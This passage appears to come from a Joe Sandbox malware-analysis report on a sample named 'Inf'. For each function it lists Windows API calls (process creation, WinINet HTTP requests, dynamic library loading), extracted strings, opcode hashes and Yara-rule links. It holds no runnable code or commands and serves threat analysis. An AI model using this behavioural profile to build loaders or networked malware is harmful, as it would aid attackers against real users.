                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k{
                                                                                                                                                                                                                                                                              • API String ID: 176396367-4172269881
                                                                                                                                                                                                                                                                              • Opcode ID: 7c95cf4597ae8270481959d2b6dea17673cc7fe010c859b2afa7d5a8f941f730
                                                                                                                                                                                                                                                                              • Instruction ID: adb2894f2341cac8b5e668d1aa5735f0f56b269edbbcf4ceaa3d610a0fb05c4d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c95cf4597ae8270481959d2b6dea17673cc7fe010c859b2afa7d5a8f941f730
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30E1F472E00516DBCB149F78C4517EEFBB1BF04791F104129E956E72A0DBB8AE8D87A0
                                                                                                                                                                                                                                                                              Function 00710436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00710436
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: InitializeCriticalSectionAndSpinCount.KERNEL32(007C170C,00000FA0,3B98D803,?,?,?,?,00732733,000000FF), ref: 0071048C
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00732733,000000FF), ref: 00710497
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00732733,000000FF), ref: 007104A8
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007104BE
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007104CC
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007104DA
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710505
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710510
                                                                                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 00710457
                                                                                                                                                                                                                                                                                • Part of subcall function 00710413: __onexit.LIBCMT ref: 00710419
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00710492
                                                                                                                                                                                                                                                                              • SleepConditionVariableCS, xrefs: 007104C4
                                                                                                                                                                                                                                                                              • InitializeConditionVariable, xrefs: 007104B8
                                                                                                                                                                                                                                                                              • kernel32.dll, xrefs: 007104A3
                                                                                                                                                                                                                                                                              • WakeAllConditionVariable, xrefs: 007104D2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                              • Opcode ID: 52c83eb971b4d2fd90106d511454a6a7b52cfb7f683fe27019d8401bce88635c
                                                                                                                                                                                                                                                                              • Instruction ID: 80b64267caf801e706e3542db6c79ffbe2a4f8d40848fb2ed399e1e604559c2d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52c83eb971b4d2fd90106d511454a6a7b52cfb7f683fe27019d8401bce88635c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E21C872A44708AFD7202BA8AC4AF993795EF05B61F104129F901922C0DAFC9CC04AD5
                                                                                                                                                                                                                                                                              Function 00764F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharLowerBuffW.USER32(00000000,00000000,0078DCD0), ref: 00764F6C
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00764F80
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00764FDE
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00765039
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00765084
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007650EC
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FD52: _wcslen.LIBCMT ref: 0070FD5D
                                                                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,007B7C10,00000061), ref: 00765188
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                              • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                              • Opcode ID: 28a91f0983dc15676f26349f60915426cb7d3a35b19160575c0420a82bc9c1ba
                                                                                                                                                                                                                                                                              • Instruction ID: 24fb2de0bff917ebd2c45c17fe2fcd4b209b2f39085efce235faa575a1bd205d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28a91f0983dc15676f26349f60915426cb7d3a35b19160575c0420a82bc9c1ba
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8B1D2716087029FC714DF28C890A7AB7E6BFA5720F50491DF996C7291E738DC84DBA2
                                                                                                                                                                                                                                                                              Function 0077BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BBF8
                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC10
                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC34
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BC60
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC74
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC96
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BD92
                                                                                                                                                                                                                                                                                • Part of subcall function 00760F4E: GetStdHandle.KERNEL32(000000F6), ref: 00760F6D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BDAB
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BDC6
                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0077BE16
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 0077BE67
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0077BE99
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077BEAA
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077BEBC
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077BECE
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0077BF43
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                              • Opcode ID: 122101984a4ae13ae05845cb1f17d672605a519ab65b85ec5bd494cb71b4493d
                                                                                                                                                                                                                                                                              • Instruction ID: 09518afa87620c81f8b19b6559507b6d979a4fdb419784ecb4854d428772dcdf
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 122101984a4ae13ae05845cb1f17d672605a519ab65b85ec5bd494cb71b4493d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20F1C171604304DFCB14EF24C895B6ABBE1BF85350F14895DF9898B2A2CB79EC45CB92
                                                                                                                                                                                                                                                                              Function 00774A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0078DCD0), ref: 00774B18
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00774B2A
                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0078DCD0), ref: 00774B4F
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,0078DCD0), ref: 00774B9B
                                                                                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,0078DCD0), ref: 00774C05
                                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00774CBF
                                                                                                                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00774D25
                                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00774D4F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                              • Opcode ID: 87a4e55d204bf96a2f0aeea0b5b3382ce0e3a62c4b50415191a2243253a797cc
                                                                                                                                                                                                                                                                              • Instruction ID: 319f7289d2eacc7b5f31e1dee633802f51c7ab2d29430dbd3cbf8292b052a129
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87a4e55d204bf96a2f0aeea0b5b3382ce0e3a62c4b50415191a2243253a797cc
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22122871A00109AFDF14CF94C888EAABBB5FF45354F25C098F909AB261D775ED46CBA0
                                                                                                                                                                                                                                                                              Function 006F381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(007C29C0), ref: 00733F72
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(007C29C0), ref: 00734022
                                                                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00734066
                                                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0073406F
                                                                                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(007C29C0,00000000,?,00000000,00000000,00000000), ref: 00734082
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0073408E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                              • Opcode ID: 818b51b78c53cb6910e30e465e27b449ac23b19d357a1d55743c432dbf4858ad
                                                                                                                                                                                                                                                                              • Instruction ID: 222b160e009469c578e857c8f4340f1662566b045637421add51bc1142e194ed
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 818b51b78c53cb6910e30e465e27b449ac23b19d357a1d55743c432dbf4858ad
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0710630644219BEFB359F28DC49FAABF65FF05364F204216F624A62D1C7B9AD10C754
                                                                                                                                                                                                                                                                              Function 00787711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 00787823
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00787897
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007878B9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007878CC
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 007878ED
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006F0000,00000000), ref: 0078791C
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00787935
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0078794E
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00787955
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0078796D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00787985
                                                                                                                                                                                                                                                                                • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                              • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                              • Opcode ID: f874f97d8d90bcd2096dee6fd869a517a5d3027374c9562d24b9242b40a749a1
                                                                                                                                                                                                                                                                              • Instruction ID: d025bf3903464f46771561a613f1968a14793ae5e194d3a017a4c904b4dfbb47
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f874f97d8d90bcd2096dee6fd869a517a5d3027374c9562d24b9242b40a749a1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3719D70188244AFD729DF18CC48F7ABBE9FB89300F24455DF986972A1C778E906DB15
                                                                                                                                                                                                                                                                              Function 006F146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006F1488,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 006F1865
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 006F1521
                                                                                                                                                                                                                                                                              • KillTimer.USER32(00000000,?,?,?,?,006F145A,00000000,?), ref: 006F15BB
                                                                                                                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 007329B4
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 007329E2
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 007329F9
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006F145A,00000000), ref: 00732A15
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00732A27
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                              • String ID: <)|
                                                                                                                                                                                                                                                                              • API String ID: 641708696-3485820698
                                                                                                                                                                                                                                                                              • Opcode ID: 1694b59196e4b75571f13b08d8b12d345fbbe7fa28dc2694cdec88be28e3ddf0
                                                                                                                                                                                                                                                                              • Instruction ID: 6b06ecd197249e133c6a8457189cc3d5fa3c579462a29bb035a783774a33d3bf
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1694b59196e4b75571f13b08d8b12d345fbbe7fa28dc2694cdec88be28e3ddf0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD617A31501719DFDB399F14D948B3A77B2FB81362F20811CE5426B6A2C778BC92DB49
                                                                                                                                                                                                                                                                              Function 0076CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CEF5
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076CF08
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076CF1C
                                                                                                                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0076CF35
                                                                                                                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0076CF78
                                                                                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0076CF8E
                                                                                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CF99
                                                                                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CFC9
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076D021
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076D035
                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0076D040
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                              • Opcode ID: 5224d9c6dfa11872ee4dcf09b8bd2582f3d6e47d41cb5dbcd9bcfdcc422ff8ed
                                                                                                                                                                                                                                                                              • Instruction ID: a06672b535b6ed345fc67de4290cfe10e8f30a870774ec263e9791ee184c14f7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5224d9c6dfa11872ee4dcf09b8bd2582f3d6e47d41cb5dbcd9bcfdcc422ff8ed
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74516DB1600604BFDB329FA1CC88ABB7BBCFF08754F108419F94696250D738DD499BA0
                                                                                                                                                                                                                                                                              Function 00788FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007866D6,?,?), ref: 00788FEE
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00788FFE
